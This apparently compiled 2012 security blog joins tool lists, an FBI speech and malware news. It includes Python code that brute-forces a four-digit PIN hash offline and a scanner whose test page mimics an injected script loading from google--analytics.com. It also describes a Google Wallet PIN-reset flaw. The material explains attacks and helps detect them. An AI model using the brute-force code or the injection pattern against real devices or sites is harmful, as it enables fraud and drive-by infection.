AFICK, short for "Another File Integrity Checker," offers similar functionality to Tripwire. It's portable, fast and runs from a GUI or the command line. Operating System: Windows, Linux.

47. Snort

Replaces Corero IPS, HP TippingPoint IPS, Sophos HIPS

With millions of downloads and more than 400,000 registered users, Snort claims to be "the most widely deployed IDS/IPS technology worldwide." Operating System: Windows, Linux, OS X.

Network Firewalls

48. IPCop

Replaces Barracuda NG Firewall, Check Point Appliances

Like most of the other apps on our Firewall list, IPCop turns a PC into a Linux-based firewall to protect your network. This one is designed for home or SOHO users, and it boasts an easy-to-use Web interface. Operating System: Linux.

49. Devil-Linux

Replaces Barracuda NG Firewall, Check Point Appliances

Although it was originally designed to offer firewall and router functionality, Devil-Linux can also operate as a server for many applications, including mail hosting. Created by IT administrators for IT administrators, it boasts top-notch security and excellent customization capabilities. Operating System: Linux.

50. Turtle Firewall

Replaces Barracuda NG Firewall, Check Point Appliances

Designed to be simple and fast, Turtle allows network managers to configure it via a Web interface or by modifying XML files. The website also includes some good introductory information on the nature of firewalls. Operating System: Linux.

51. Shorewall

Replaces Barracuda NG Firewall, Check Point Appliances

Shorewall doesn't claim to be the easiest Linux firewall to use, but it does claim to be "the most flexible and powerful." You can use it on a system functioning as a dedicated firewall, as a multi-function gateway/router/server or as a standalone GNU/Linux PC. Operating System: Linux.

52. Vuurmuur

Replaces Barracuda NG Firewall, Check Point Appliances

Vuurmuur is designed to be both simple and powerful. In addition to standard firewall capabilities, it also supports traffic shaping and offers advanced monitoring capabilities. Operating System: Linux.

53. m0n0wall

Replaces Barracuda NG Firewall

Although it was designed for embedded PCs and appliances, m0n0wall can also run on a standalone PC running FreeBSD. It requires less than 12MB of space and boots in less than 25 seconds. Operating System: FreeBSD.

54. pfSense

Replaces Barracuda NG Firewall, Check Point Appliances

This m0n0wall fork is also based on BSD, but is designed for regular computers, not embedded hardware. It's been downloaded more than 1 million times and currently runs on more than 100,000 networks, including large corporations and universities as well as small home networks. Operating System: FreeBSD.

55. Vyatta

Replaces Cisco products

The "core" Vyatta software allows users to make their own firewalls/networking appliances and routers. The company also offers paid software and hardware. Operating System: Linux.

Network Monitoring

56. Wireshark

Replaces: OmniPeek, CommView

Calling itself the "world's foremost network protocol analyzer," Wireshark makes it easy to capture and analyze network traffic. Commercial products and services related to the software are available through Riverbed Technology. Operating System: Windows, Linux, OS X.

57. tcpdump/libpcap

Replaces: OmniPeek, CommView

Tcpdump is a command line packet analyzer, and libpcap is a C/C++ library for network traffic capture. Working together, the two provide a good network monitoring solution, but, lacking a GUI, they are not particularly user-friendly. Operating System: Linux.

58. WinDump

Replaces: OmniPeek, CommView

Managed by Riverbed Technology (which also owns Wireshark), WinDump ports tcpdump to the Windows platform. This site also includes the WinPcap library and drivers for traffic capture. Operating System: Windows.

Password Crackers

59. Ophcrack

Replaces Access Data Password Recovery Toolkit, Passware

From time to time, everyone needs to recover a lost or unknown password. This password cracker uses the rainbow tables method to recover unknown passwords, and it also includes a brute force module for simple passwords. Operating System: Windows.

60. John the Ripper

Replaces Access Data Password Recovery Toolkit, Passware

John the Ripper is particularly good at cracking weak passwords, but in order to use it, you'll need a list of commonly used passwords. You can buy password lists or a pro version of the software from the same site. Operating System: Windows, Linux, OS X.

Password Management

61. KeePass Password Safe

Replaces Kaspersky Password Manager

This popular password manager stores all of your passwords in an encrypted database. You'll only need to remember one master password, while this easy-to-use, lightweight app helps protect you from identity thieves. Operating System: Windows.

62. KeePassX

Replaces Kaspersky Password Manager

If you use OS X or Linux, try this fork of KeePass. Plus, it adds a few features not in the original and runs on Windows as well. Operating System: Windows, Linux, OS X.

63. Password Safe

Replaces Kaspersky Password Manager

Downloaded more than 1 million times, Password Safe is another popular open source option for protecting your passwords. Like KeePass, it's lightweight and stores your encrypted passwords in a database so that you only need to recall one master password. Operating System: Windows.

User Authentication

64. WiKID

Replaces Entrust IdentityGuard, Vasco Digipass, RSA's SecurID

WiKID boasts "two-factor authentication without the hassle factor." In addition to the free community version, it also comes in a supported enterprise version which also adds additional functionality. Operating System: OS Independent.

Web Filtering

65. DansGuardian

Replaces McAfee Family Protection, NetNanny, CyberPatrol

This award-winning content filter uses phrase matching, PICS filtering, URL filtering and other methods to block objectionable content. Note that this software does not run on individual PCs; it runs on an OS X or Linux server to protect the rest of your network. Operating System: Linux, OS X.

[Security] Combating Threats in the Cyber World: Outsmarting Terrorists, Hackers, and Spies

Good afternoon. I am indeed honored to be here, and gratified to be back in San Francisco.

A few weeks ago, there was a story in The New York Times about a woman who was taking a break from work. She was watching YouTube videos on her iPhone when a man walked up, pointed a gun at her, grabbed the phone, and ran.

A New York City police officer responded to the call and told her not to worry, that he would find her phone. He grabbed his own phone, opened the “Find My iPhone” app, and typed in the victim’s Apple ID. In seconds, a phone icon popped up, showing that the subject was near 8th Avenue and 51st Street. The officer and his partner headed that way.

As they pulled up, the officer pushed a button on his phone, and they began to hear a pinging noise some 20 feet away. The officer hit “Play” once more, and they followed the pinging to its source, which turned out to be in the man’s sock. The Times reporter pointed out that had the subject been tech savvy, he might have known how to disable the iCloud setting and stop the trace.

If only every case could be solved so easily, and in less than 30 minutes.

Technology has become pervasive as a target. It has also been used as a means of attack. But this story illustrates our use of technology as an investigative tool. It also illustrates the power of innovative thinking and fast action—the very tools we need to stop those who have hijacked cyber space for their own ends.

Technology is moving so rapidly that from a security perspective, it is difficult to keep up. Consider the evolution of cyber crime in just the past decade.

When I was the U.S. Attorney here in 2000, we worked with the Royal Canadian Mounted Police to track down a Canadian teenager known as “Mafiaboy.” He was responsible for the largest denial of service attack at that time. He targeted eBay, Yahoo, E*Trade, Global Crossing, and CNN, just to see if he could shut them down…and he could and did.

When he was finally caught, the 15-year-old was reportedly at a sleepover at a friend’s house, eating junk food and watching “Goodfellas.” He said at the time that he did not understand the consequences of his actions. That now seems like the good old days.

Traditional crime—from mortgage and health care fraud to child exploitation—has migrated online. Terrorists use the Internet as a recruiting tool, a moneymaker, a training ground, and a virtual town square, all in one.

At the same time, we confront hacktivists, organized criminal syndicates, hostile foreign nations that seek our state secrets and our trade secrets, and mercenaries willing to hack for the right price. And we have seen firsthand what happens when countries launch cyber attacks against other nations as a means of exerting power and control.

Today we will discuss what we in the FBI view as the most dangerous cyber threats, what we are doing to confront these threats, and why it is imperative that we work together to protect our intellectual property, our infrastructure, and our economy.

Let me begin with cyber threats to our national security.

Terrorists are increasingly cyber savvy. Much like every other multi-national organization, they are using the Internet to grow their business and to connect with like-minded individuals. And they are not hiding in the shadows of cyber space.

Al Qaeda in the Arabian Peninsula has produced a full-color, English-language online magazine. They are not only sharing ideas, they are soliciting information and inviting recruits to join al Qaeda.

Al Shabaab—the al Qaeda affiliate in Somalia—has its own Twitter account. Al Shabaab uses it to taunt its enemies—in English—and to encourage terrorist activity.

Extremists are not merely making use of the Internet for propaganda and recruitment. They are also using cyber space to conduct operations.

The individuals who planned the attempted Times Square bombing in May 2010 used public web cameras for reconnaissance. They used file-sharing sites to share sensitive operational details. They deployed remote conferencing software to communicate. They used a proxy server to avoid being tracked by an IP address. And they claimed responsibility for the attempted attack—on YouTube.

To date, terrorists have not used the Internet to launch a full-scale cyber attack. But we cannot underestimate their intent. In one hacker recruiting video, a terrorist proclaims that cyber warfare will be the warfare of the future.

Terrorist use of the Internet is not our only national security concern. As we know, state-sponsored computer hacking and economic espionage pose significant challenges.

Just as traditional crime has migrated online, so, too, has espionage. Hostile foreign nations seek our intellectual property and our trade secrets for military and competitive advantage.

State-sponsored hackers are patient and calculating. They have the time, the money, and the resources to burrow in, and to wait. They may come and go, conducting reconnaissance and exfiltrating bits of seemingly innocuous information—information that in the aggregate may be of high value.

You may discover one breach, only to find that the real damage has been done at a much higher level.

Unlike state-sponsored intruders, hackers for profit do not seek information for political power—they seek information for sale to the highest bidder. These once-isolated hackers have joined forces to create criminal syndicates. Organized crime in cyber space offers a higher profit with a lower probability of being identified and prosecuted.

Unlike traditional crime families, these hackers may never meet, but they possess specialized skills in high demand.

They exploit routine vulnerabilities. They move in quickly, make their money, and disappear. No company is immune, from the Fortune 500 corporation to the neighborhood “mom and pop” business.

We are also worried about trusted insiders who may be lured into selling secrets for monetary gain. Perimeter defense may not matter if the enemy is inside the gates.

The end result of these developments is that we are losing data. We are losing money. We are losing ideas and we are losing innovation. And as citizens, we are increasingly vulnerable to losing our information. Together we must find a way to stop the bleeding.

We in the FBI have built up a substantial expertise to address these threats, both here at home and abroad.

We have cyber squads in each of our 56 field offices, with more than 1,000 specially trained agents, analysts, and forensic specialists. Given the FBI’s dual role in law enforcement and national security, we are uniquely positioned to collect the intelligence we need to take down criminal networks, prosecute those responsible, and protect our national security.

But we cannot confront cyber crime on our own.

Borders and boundaries pose no obstacles for hackers. But they continue to pose obstacles for global law enforcement, with conflicting laws, different priorities, and diverse criminal justice systems. With each passing day, the need for a collective approach—for true collaboration and timely information sharing—becomes more pressing.

The FBI has 63 legal attaché offices that cover the globe. Together with our international counterparts, we are sharing information and coordinating investigations. We have special agents embedded with police departments in Romania, Estonia, Ukraine, and the Netherlands, working to identify emerging trends and key players.

Here at home, the National Cyber Investigative Joint Task Force brings together 18 law enforcement, military, and intelligence agencies to stop current and predict future attacks. With our partners at DHS, CIA, NSA, and the Secret Service, we are targeting cyber threats facing our nation. The task force operates through Threat Focus Cells—specialized groups of agents, officers, and analysts that are focused on particular threats, such as botnets.

Together we are making progress.

Last April, with our private sector and law enforcement partners, the FBI dismantled the Coreflood botnet. This botnet infected an estimated two million computers with malware that enabled hackers to seize control of zombie computers to steal personal and financial information.

With court approval, the FBI seized domain names and re-routed the botnet to FBI-controlled servers. The servers directed the zombie computers to stop the Coreflood software, preventing potential harm to hundreds of thousands of users.

In another case, just a few months ago, we worked with NASA’s Inspector General and our partners in Estonia, Denmark, Germany, and the Netherlands to shut down a criminal network operated by an Estonian company by the name of Rove Digital.

The investigation, called Operation Ghost Click, targeted a ring of criminals who manipulated Internet “click” advertising. They re-directed users to their own advertisements and generated more than $14 million in illegal fees. This “click” scheme impacted more than 100 countries and infected four million computers, half-a-million of which were here in the United States.

We seized and disabled computers, froze the defendants’ bank accounts, and replaced rogue servers with legitimate ones to minimize service disruptions. With our Estonian partners, we arrested and charged six Estonian nationals for their participation in the scheme.

And again, we must continue to push forward together.

Terrorism remains the FBI’s top priority. But in the not too distant future, we anticipate that the cyber threat will pose the number one threat to our country.

We need to take lessons learned from fighting terrorism and apply them to cyber crime. We will ensure that all of our special agents have the fundamental skills to operate in this cyber environment. Those agents specializing in cyber matters will have the greatest possible skill set.

We are creating a structure whereby a cyber agent in San Francisco can work in a virtual environment with an agent in Texas, an analyst in Virginia, and a forensic specialist in New York to solve a computer intrusion that emanated from Eastern Europe.

At the same time, we must rely on the traditional capabilities of the Bureau: sources and wires. We must cultivate the sources necessary to infiltrate criminal online networks, to collect the intelligence to prevent the next attack, and to topple the network from the inside. We must ensure that our ability to intercept communications—pursuant to court order—is not eroded by advances in technology. These include wireless technology and peer-to-peer networks, as well as social media.

We will also continue to enhance our collective ability to fight cyber crime.

Following the September 11th terrorist attacks, we increased the number of Joint Terrorism Task Forces. Today, we have more than 100 such task forces—with agents, state and local law enforcement officers, and military personnel—working together to prevent terrorism.

We are developing a similar model to fight cyber crime—to bolster our capabilities and to build those of state and local law enforcement as well.

Along these same lines, 12 years ago we joined forces to address both the growing volume and complexity of digital evidence. Together with our state and local partners, we created the first Regional Computer Forensics Laboratory in San Diego. Today, we have 16 such labs across the country, where we collaborate on cases ranging from child exploitation to public corruption. Together we are using technology to identify and prosecute criminals and terrorists.

Working with our partners at DHS and the National Cyber-Forensics Training Alliance, we are using intelligence to create an operational picture of the cyber threat—to identify patterns and players, to link cases and criminals.

Real-time information-sharing is essential. Much information can and should be shared with the private sector. And in turn, those of you in the private sector must have the means and the motivation to work with us.

We in the Bureau are pushing for legislation to provide for national data breach reporting. This would require companies to report significant cyber breaches to law enforcement and to consumers. Forty-seven states already require the reporting of data breaches, but they do so in different ways and to different degrees.

We must continue to break down walls and to share information, in the same way we did in the wake of the September 11th attacks. This includes the walls that sometimes exist between law enforcement and the private sector.

You here today are often the first to see new threats coming down the road. You know what data is critically important, and what could be at risk.

And while you are fierce competitors in the marketplace, you routinely collaborate behind the scenes. For example, Microsoft, Google, Facebook, and Bank of America, along with several other companies, have joined forces to design a system to authenticate legitimate e-mails and weed out fake messages.

Such collaboration is commonplace now. But 12 years ago in the “Mafiaboy” case, several of the affected companies shared their experiences and worked together—for the first time—to present a united front against that denial of service attack.

Public-private partnerships are equally important.

Through the FBI’s InfraGard program, individuals in law enforcement, government, the private sector, and academia meet to talk about how to protect our critical infrastructure. Over the past 15 years, InfraGard has grown from a single chapter in the Cleveland FBI Field Office to more than 85 chapters across the country, with more than 47,000 members.

Recently, after attending a local InfraGard meeting, one member recognized a phishing scam and notified the FBI. We identified 100 U.S. banks that had been victimized by unauthorized ATM withdrawals in Romania. Eighteen Romanian citizens were charged and eight individuals were extradited to the United States. Three have pled guilty, with one sentenced to more than four years in prison.

We in the FBI understand that you may be reluctant to report security breaches. You may believe that notifying the authorities will harm your competitive position. You may fear that news of a breach will erode shareholder confidence. Or you may think that the information flows just one way—and that is to us.

We do not want you to feel victimized a second time by an investigation. We will minimize the disruption to your business, and we will safeguard your privacy. Where necessary, we will seek protective orders to preserve trade secrets and business confidentiality. And we will share with you what we can, as quickly as we can, about the means and the methods of attack.

But maintaining a code of silence will not serve us in the long run. For it is no longer a question of “if,” but “when” and “how often.”

I am convinced that there are only two types of companies: those that have been hacked and those that will be. And even they are converging into one category: companies that have been hacked and will be hacked again.

Given that scenario, we must limit the data that can be gleaned from any compromise. We must segregate mission-centric data from routine information. And we must incorporate layers of protection and layers of access to critical information.

We may need to look at alternative architectures that are more secure...that allow critical infrastructure owners and operators to better spot threat actors and to provide information to law enforcement to track and to catch them.

Attribution is critical to deter future attacks. We cannot just minimize vulnerabilities and deal with the consequences. Collectively, we can improve cyber security and lower costs—with systems designed to catch threat actors rather than to withstand them.

Several months ago, I read William Powers’ book, “Hamlet’s BlackBerry,” about the impact of technology on civilization. In one chapter, he wrote about the Roman philosopher Seneca. In the days of the Roman Empire, connectivity was on the rise—new roads, new ways of communicating, and a new postal system to handle the influx of written documents. Postal deliveries were the high point of the day. People coming from every direction would converge at the port to meet the delivery boats arriving from Egypt.

As they say, the more things change, the more they stay the same.

Today we have the so-called “BlackBerry Jam,” where several individuals—heads down, shoulders slumped, all furiously typing, talking, reading, or browsing at once—come to a head on a crowded corner. We are all guilty of this conduct.

All those years ago, Seneca argued that the more connected society becomes, the greater the chance that the individual will become a slave to that connectivity. Today, one could argue that the more connected we become, the greater the risk to all of us.

We cannot turn back the clock. We cannot undo the impact of technology. Nor would we want to.

But we must continue to build our collective capabilities to fight the cyber threat…we must share information…we must work together to safeguard our property, our privacy, our ideas, and our innovation.

We must use our connectivity to stop those who seek to do us harm.

Thank you and God bless.

[ Via combating-threats-in-the-cyber-world-outsmarting-terrorists-hackers-and-spies ]

[Security] The Four Phases of Every Attack

Let’s face it: threats have gotten much more complex; like complex mechanisms, they use multiple, consecutive methods to attack. At McAfee, our research teams continually analyze the threat landscape and define threats in terms of their attack mechanisms, which consistently fall into four categories. First, malware needs a way to come into contact with unsuspecting users. Second, it uses a variety of ways to enter your system and begin writing files to disk and modifying your system. Third, it uses several means to hide from detection before it even begins its dirty work of stealing personal information or scaring you into buying useless security software. It’s not until the fourth phase that it really starts its unscrupulous business.

In this discussion, we will share some research showing the four phases of every malicious attack, and in a follow-on blog we will provide some recommendations as to how you can protect yourself and your business.

First, let’s look at the first phase of how modern threats operate: how the attacker first crosses paths with the victim. The most common form of first contact is via a malicious web site. The web continues to be a dangerous place for the uninformed and unprotected. Websites can become malicious on purpose or by infection and host malware, potentially unwanted programs, or phishing sites. In 2011, McAfee Labs recorded an average of 6,500 new bad sites per day; in one quarter that figure shot up to 9,300. We also noticed that about one in every 400 URLs we attempted to load was malicious; some days that number was one in every 200 URLs! Protecting users from these sites is essential and is actually the least expensive way to maintain a secure environment. Other important methods include physical access, such as thumb drives used by Advanced Persistent Threats (APTs), unsolicited messages from social media sites, and network access from misconfigured or insecure wireless networks.

Phase 2 covers the ways the attacker gets code running for the first time on the target machine. The vast majority of the time, the code exploits one or more of the thousands of vulnerabilities in common, legitimate applications or in the operating system itself. If the malware can take down or otherwise subvert the protections in existing software, it can write its code to disk and move on to phase three.

In phase 3, the goal is to persist the malicious code on the system so that it survives a reboot, stays hidden from security measures and hides itself from the user. The code can hide itself in known-good processes, block access to security software updates, disable the Windows Task Manager, Windows Safe Mode, System Restore, the Firewall and Microsoft Security Center, and change browser security settings. Rootkits and other advanced attacks have been particularly difficult to stop, as they often load before the operating system, effectively hiding from security software.

And finally, in phase 4, we get to the real reason for the malware, its ‘business logic’: what the attacker wants to accomplish. This could be stealing identities or passwords, bank fraud, forcing the purchase of fake antivirus software, stealing intellectual property, or selling botnet services.

In my next blog, I will discuss ways in which today’s security products can be used to protect you in each of the 4 phases.

[Via http://blogs.mcafee.com]

[RAT] How to write a complaint reporting a computer crime

When you are the victim of a computer crime, you can ask the legal authorities for protection.
A complaint form template you can use

Note:
Send it directly as a handwritten or typed letter
About the form
Section 1. The receiving agency: you can refer to this post to-giac-toi-pham.html
Section 3. State the details of the incident clearly
For example, if there are signs of fraud or misappropriation of property, describe the events from the beginning ---> the point where you suspected or discovered you had been defrauded
Section 4. Request that the agency ..... investigate, return the money or property.... and prosecute the fraudster
Section 5. The declaration of truthfulness
In addition, you should attach PHOTOCOPIES of the relevant documents (chat logs, phone numbers, nicknames, money transfer receipts, account information, etc.)

20 March 2012

[Security] Happy Birthday IE 8

It was three years ago today (March 19, 2009) that Microsoft unleashed Internet Explorer (IE) 8. According to Microsoft, the priorities for IE 8 were security, compatibility, ease of use, web development improvements, as well as adhering to CSS specifications and other web standards.

Three years on, IE 8 is still the second most used web browser version in the world.

[ Via pingdom ]

[Tool] Oxygen Forensic SQLite Viewer v.2.1

Oxygen Software announces Oxygen Forensic SQLite Viewer v.2.1. This version introduces data export to PDF, XLS, XML and other formats, and the ability to export selected tables. The new version also improves the conversion utilities, introduces the conversion sidebar and adds the ability to save big BLOB fields to a file. All registered customers may download the new version immediately from their personal customer area.

New in Oxygen Forensic SQLite Viewer v.2.1:

* Added export to RTF, PDF, XML, XLS, CSV, TSV and HTML file formats.
* Added ability to export selected tables.
* Added ability to select multiple records on Deleted data tab.
* The data type (‘Table record’ or ‘Deleted record’) is shown when copying entries to the clipboard.
* Added support for OS X Epoch format conversion.
* Added an external window to view the data.
* Added ability to save big BLOB fields in a file.
* Faster SQLite Viewer performance.
* Improved conversion of millisecond UNIX format dates.
* Improved conversion: automatic conversion is done in a single sidebar.
* Improved support for Base64 conversion.
* General interface improvements.
* Fixed error that sometimes occurred after closing the Viewer.

[Infographic] WordPress developers are driving

[Security] Victorian Taxi Directorate exposes 400+ email addresses

The Victorian Taxi Directorate has earned the ire of people it was trying to placate, after it put more than 400 email addresses in the “To:” field of an email it sent to ask about its complaints resolution process.

The email, sent yesterday, said “The Victorian Taxi Directorate (VTD) is committed to continually improving its customer service and complaints handling processes,” and went on to say recipients should “... be assured that your personal details have been collected and used consistent with Privacy Act 2000.”

Except for their email addresses, that is, as 432 by The Register's count were included in the “To:” field for all recipients to see. Some have hit “Reply All”, creating a merry little email storm that is pleasing nobody.

Angry recipients, including Register readers, have pointed out the situation and its absurdity.

The Directorate has quickly apologised for the mess, with Assistant Manager of Communications Bob Nelson saying it is “absolutely not” the organisation's policy to share email addresses in this way.

“It was a genuine piece of human error,” he said. “They put the addresses into the wrong field instead of cc or bcc. The person who did it is feeling very regretful.”

“We sent another email getting in touch with everyone once we knew what had happened,” Nelson added. The organisation has also 'fessed up to the Privacy Commissioner about the mess.


17 March 2012

[Security] Malware OSX/Imuler OSX/Revir.A dropper

This new variant is very similar to its ancestors in terms of command-and-control (C&C) communication and functionalities. (OSX/Imuler is an information stealer that can gather and transmit files, screenshots, and other data to a remote server.) The network protocol is still HTTP-based and the payload is compressed with zlib. The hardcoded C&C domain now being used is a new one, registered on February 13th, 2012 via a Chinese registrar. The domain points to the same IP address as the previous variants, located in the USA and still active at time of writing.

This all seems to indicate that the new variant was most likely released to improve its anti-virus evasion.

OSX/Imuler has the functionality to upload arbitrary local files to the C&C. A specialized separate executable named CurlUpload, downloaded from the C&C every time the malware starts, is used to perform the operation. This stand-alone executable, first seen in early 2011, presents interesting strings that suggest it was initially built for Win32 but later recompiled for OS X:

ESET security software (including ESET Cybersecurity for Mac) since signature update 6970 detects this new variant as OSX/Imuler.C.

MD5 of the files analyzed:

7dba3a178662e7ff904d12f260f0fff3 (Installer)
9d2462920fdaed5e360875fb0cf8274f (malicious payload)
e00a280ad29440dcaab42ad093bcaafd (uploader module)

Big thanks to my colleague Marc-Étienne M. Léveillé for his work on this investigation.

[ Via Blog Eset ]

16 March 2012

[Security] Australia lacks cash for cybercrime study

The Australian Institute of Criminology (AIC) does not have the resources to repeat its 2009 Australian Business Assessment of Computer User Security (ABACUS) study into the prevalence of cybercrime in Australia.

An AIC spokesperson told The Register that the cost and complexity involved in an ABACUS study is not something the Institute can currently contemplate, and added “It’s certainly important to keep track of the trends in this area, although nationally representative prevalence surveys of cybercrime are rarely undertaken.”

“The AIC will, if resources are available, look to undertake similar surveys to our ABACUS project that was one of the few large-scale business victimisation surveys in this area.”

The AIC's 2011 Australian crime: Facts & figures report therefore uses previously-published data from AusCERT and the Australian Competition and Consumer Commission (ACCC). Both sources collected data for 2010 studies. That leaves the cyber crime section of the AIC's 2011 report reliant on aged data from a year other than the one defined as the document's reporting period.

We don't think anyone needs advanced epistemological training to deduce that the report may therefore be a little light-on.

[ Via theregister ]

15 March 2012

[Report] Monthly Malware Statistics: February 2012

Vulnerabilities in the Google Wallet payment system

In autumn 2011, Google launched Google Wallet, an e-payment system that allows users to pay for goods and services using Android phones with Near Field Communication (NFC — contactless transactions). The Google Wallet app is installed on a smartphone and the user specifies which credit card to use. To process payments, the owner of the phone must enter a PIN in the Google Wallet app and put the phone in proximity to the scanning device. The phone will then transfer encrypted data to complete the transaction.

When Google announced this new service, data security professionals voiced some doubts about security if a phone were to be lost or stolen or otherwise fall into someone else’s hands. Then, in early February, two methods used to hack Google Wallet were detected.

First, Joshua Rubin, an engineer at zVelo, showed how the PIN can be recovered if someone gains access to the phone. Bank account data is stored in a special, secured section (the Secure Element) of the NFC chip, but the PIN hash is stored on the phone’s file system. Root access is needed to read the hash, and that can be gained using well-known hacker tactics. Since PIN codes are just four-digit numbers, malicious users don’t need to spend a lot of time trying combinations to get the proper sequence. Once the PIN is determined, a malicious user can purchase products using the phone owner’s Google Wallet account.

Just one day later, a second method was published for taking over the Google Wallet account on a found or stolen phone, this time without root access or any attack on the PIN hash. It exploits a flaw in the Google Wallet app itself: if the app's stored data is cleared from the Android application settings menu, the app asks for a new PIN the next time it is launched and never asks for the previous one, leaving the wallet usable under a PIN the finder chose.

Both issues were reported to Google, which suspended Google Wallet operations for several days in order to fix them. Google later announced that the app had been fixed and the service updated. However, as of 1 March there was still no word of a fix for the brute-force attack on the PIN hash. Preventing that attack means storing and verifying the PIN inside the Secure Element, next to the other card data, where a retry counter can limit the number of guesses; an attacker who can read the hash from the file system can try all 10,000 values offline, and no amount of hashing changes that. But this is where a contractual problem appears: in that design the banks, not Google, would be responsible for PIN security inside the Secure Element.
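
To make the size of the problem concrete, here is an added example that models the two designs described above; it is written for this page and is not Kaspersky's, zVelo's or Google's code. The first function performs the offline search against a hash readable from the file system; the second models verification inside a tamper-resistant element that counts failed attempts. The hash construction (SHA-256 over salt||PIN), the random salt and the five-attempt limit are assumptions made for illustration, not the real Google Wallet format.

```python
import hashlib
import hmac
import os
from typing import Optional

PIN_SPACE = 10_000  # a four-digit PIN has exactly 10,000 possible values


def pin_hash(pin: str, salt: bytes) -> bytes:
    """Salted SHA-256 of a PIN.

    ASSUMPTION: a generic salt||PIN construction, chosen only to show that
    the search space, not the hash function, is what decides the outcome.
    """
    return hashlib.sha256(salt + pin.encode("ascii")).digest()


def brute_force_offline(stolen_hash: bytes, salt: bytes) -> Optional[str]:
    """Attack 1: the hash and salt were read from the file system (root),
    so every candidate can be tried locally with no attempt limit."""
    for n in range(PIN_SPACE):
        candidate = f"{n:04d}"
        if pin_hash(candidate, salt) == stolen_hash:
            return candidate
    return None


class SecureElementPin:
    """Model of PIN verification inside a tamper-resistant element:
    the hash never leaves the element and a retry counter blocks guessing.
    The five-try limit is an assumed policy, not a Google Wallet value."""

    def __init__(self, pin: str, max_tries: int = 5):
        self._salt = os.urandom(16)
        self._hash = pin_hash(pin, self._salt)
        self._max_tries = max_tries
        self._failures = 0

    @property
    def locked(self) -> bool:
        return self._failures >= self._max_tries

    def verify(self, attempt: str) -> bool:
        if self.locked:
            raise PermissionError("PIN locked after too many failed attempts")
        if hmac.compare_digest(pin_hash(attempt, self._salt), self._hash):
            self._failures = 0
            return True
        self._failures += 1
        return False


def brute_force_online(element: SecureElementPin) -> Optional[str]:
    """Attack 2: the same search, but each guess must go through the element,
    so the counter stops it after max_tries failures."""
    for n in range(PIN_SPACE):
        candidate = f"{n:04d}"
        try:
            if element.verify(candidate):
                return candidate
        except PermissionError:
            return None
    return None


if __name__ == "__main__":
    salt = b"constructed-salt"  # constructed sample, stands in for the stored salt
    stolen = pin_hash("4207", salt)
    print("offline search recovers:", brute_force_offline(stolen, salt))
    element = SecureElementPin("4207")
    print("online search recovers:", brute_force_online(element), "locked:", element.locked)
```

Key stretching does not rescue a four-digit PIN: even PBKDF2 at 100,000 iterations leaves roughly 10^9 hash operations for the whole space, which is minutes on a laptop. The retry counter changes the economics because guesses can no longer be computed offline, which is why the hash belongs in the Secure Element.
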

Fake Google Analytics code redirects users to BlackHole Exploit Kit

Attackers often compromise legitimate websites in order to distribute malware: malicious code is injected into the compromised site's pages, and all kinds of tricks are used to keep the site's owner from noticing anything suspicious. In early February, Kaspersky Lab tracked a wave of infections in which the injected code was disguised as Google Analytics code.

The fake code has a few distinguishing features:
- The hostname uses a double dash, unlike the real one (google--analytics.com instead of google-analytics.com).
- In genuine Google code the account ID is a unique numeric string (e.g. UA-5902056-8) that identifies the website. The malicious code uses the literal placeholder "UA-XXXXX-X" instead.
- The injected code is placed at the very start of the page, even before the <html> tag, whereas real Google Analytics code is typically located near the end of the page.

When a user visits a page carrying this code, the browser fetches an obfuscated "ga.js" script from google--analytics.com, which sends the visitor through a chain of redirects ending at a server hosting the BlackHole Exploit Kit. If one of the kit's exploits succeeds, the visitor's computer is infected with malware.
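
The three indicators above can be turned into a simple static check over page source. The following is an added example written for this page, not a Kaspersky tool: it scans raw HTML for the placeholder account ID and for script placed before the <html> tag, and it generalizes the double-dash indicator to any ga.js reference served from a host other than google-analytics.com (so look-alike domains are caught too). The two sample pages are constructed for the test and only imitate the shape of the 2012 Google Analytics snippet.

```python
import re
from typing import List

GA_HOST = "google-analytics.com"  # the real snippet prefixes this with www. or ssl.

# host portion immediately preceding "/ga.js" inside any string or attribute
GA_JS_REF = re.compile(r"([A-Za-z0-9.-]+)/ga\.js", re.I)
# the documentation placeholder left in place by the injected code
PLACEHOLDER_ID = re.compile(r"UA-X{3,}-X+", re.I)
HTML_TAG = re.compile(r"<html\b", re.I)
# things that may legitimately precede <html>: comments, doctype, whitespace
IGNORABLE_PREFIX = re.compile(r"<!--.*?-->|<!DOCTYPE[^>]*>|\s+", re.I | re.S)


def is_google_host(host: str) -> bool:
    host = host.lstrip(".").lower()
    return host == GA_HOST or host.endswith("." + GA_HOST)


def scan_page(html: str) -> List[str]:
    """Return a list of indicators found in the page; empty means clean."""
    findings = []
    for m in GA_JS_REF.finditer(html):
        host = m.group(1).lstrip(".")
        if not is_google_host(host):
            findings.append(f"ga.js loaded from non-Google host: {host}")
    if PLACEHOLDER_ID.search(html):
        findings.append("tracker uses placeholder account id (UA-XXXXX-X)")
    tag = HTML_TAG.search(html)
    if tag and "<script" in IGNORABLE_PREFIX.sub("", html[:tag.start()]).lower():
        findings.append("script element placed before <html>")
    return findings


# Constructed samples: the asynchronous GA snippet of the period, parameterised
# so the clean and injected variants differ only in account id and host.
def ga_snippet(account_id: str, host: str) -> str:
    return (
        "<script type=\"text/javascript\">\n"
        "  var _gaq = _gaq || [];\n"
        f"  _gaq.push(['_setAccount', '{account_id}']);\n"
        "  _gaq.push(['_trackPageview']);\n"
        "  (function() {\n"
        "    var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;\n"
        "    ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + "
        f"'.{host}/ga.js';\n"
        "    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);\n"
        "  })();\n"
        "</script>\n"
    )


BODY = "<!DOCTYPE html>\n<html><head><title>Example site</title></head>\n<body>\n<p>Page content.</p>\n"

# genuine tracker, real-looking id, placed at the end of the page
CLEAN_PAGE = BODY + ga_snippet("UA-5902056-8", "google-analytics.com") + "</body></html>\n"

# injected tracker: placeholder id, double-dash host, placed before <html>
INFECTED_PAGE = ga_snippet("UA-XXXXX-X", "google--analytics.com") + BODY + "</body></html>\n"


if __name__ == "__main__":
    for name, page in (("clean", CLEAN_PAGE), ("infected", INFECTED_PAGE)):
        print(name, scan_page(page) or "no indicators")
```

Run it over saved copies of a site's pages (for example the output of a crawl) rather than the live site, since the injected script only has to execute once in a browser to start the redirect chain. Any finding is a reason to diff the page against a known-good copy; the host check alone is enough to catch the campaign even after the operators change the account ID or the position of the snippet.
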

At the time of writing, the fake site google--analytics.com is no longer operational. Some compromised websites still carry the fake Google Analytics code, but for now it is inert; it would become dangerous again if the domain were brought back online.
